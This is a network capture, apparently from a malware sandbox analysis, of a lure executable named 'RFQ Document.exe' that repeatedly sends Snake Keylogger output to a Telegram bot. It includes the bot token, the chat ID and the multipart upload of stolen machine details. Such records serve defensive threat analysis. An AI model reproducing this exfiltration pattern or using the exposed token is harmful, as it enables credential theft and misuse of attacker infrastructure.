2021-09-28 05:59:49 UTC	486	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:49 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:49 UTC	487	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12895,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808789,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
306	192.168.2.4	50143	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:49 UTC	487	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f6f3139c Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:49 UTC	488	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 36 66 33 31 33 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f6f3139cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:49 UTC	488	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:49 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 10 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:49 UTC	488	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 30 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 30 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 10","parameters":{"retry_after":10}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
307	192.168.2.4	50144	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:49 UTC	488	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f70ae976 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:49 UTC	489	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 37 30 61 65 39 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f70ae976Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:50 UTC	489	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:50 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 10 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:50 UTC	490	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 30 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 30 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 10","parameters":{"retry_after":10}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
308	192.168.2.4	50145	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:50 UTC	490	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f7193963 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:50 UTC	490	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 37 31 39 33 39 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f7193963Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:50 UTC	490	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:50 GMT Content-Type: application/json Content-Length: 109 Connection: close Retry-After: 9 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:50 UTC	491	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 39 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 9","parameters":{"retry_after":9}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
309	192.168.2.4	50146	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:50 UTC	491	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f7310ec4 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:50 UTC	491	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 37 33 31 30 65 63 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f7310ec4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:50 UTC	492	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:50 GMT Content-Type: application/json Content-Length: 109 Connection: close Retry-After: 9 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:50 UTC	492	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 39 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 9","parameters":{"retry_after":9}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.4	49805	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:26 UTC	49	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c5922b0d Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:26 UTC	49	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 35 39 32 32 62 30 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c5922b0dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:27 UTC	50	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:27 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:27 UTC	50	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12611,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808707,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
310	192.168.2.4	50147	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:50 UTC	492	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f7500d3d Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:50 UTC	492	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 37 35 30 30 64 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f7500d3dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:50 UTC	493	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:50 GMT Content-Type: application/json Content-Length: 109 Connection: close Retry-After: 9 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:50 UTC	493	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 39 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 9","parameters":{"retry_after":9}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
311	192.168.2.4	50148	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:50 UTC	493	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f765838f Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:50 UTC	493	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 37 36 35 38 33 38 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f765838fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:50 UTC	494	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:50 GMT Content-Type: application/json Content-Length: 109 Connection: close Retry-After: 9 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:50 UTC	494	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 39 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 9","parameters":{"retry_after":9}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
312	192.168.2.4	50149	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:50 UTC	494	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f77d5a04 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:50 UTC	495	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 37 37 64 35 61 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f77d5a04Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:50 UTC	495	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:50 GMT Content-Type: application/json Content-Length: 109 Connection: close Retry-After: 9 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:50 UTC	495	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 39 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 9","parameters":{"retry_after":9}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
313	192.168.2.4	50150	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:50 UTC	496	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f79531e4 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:50 UTC	496	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 37 39 35 33 31 65 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: 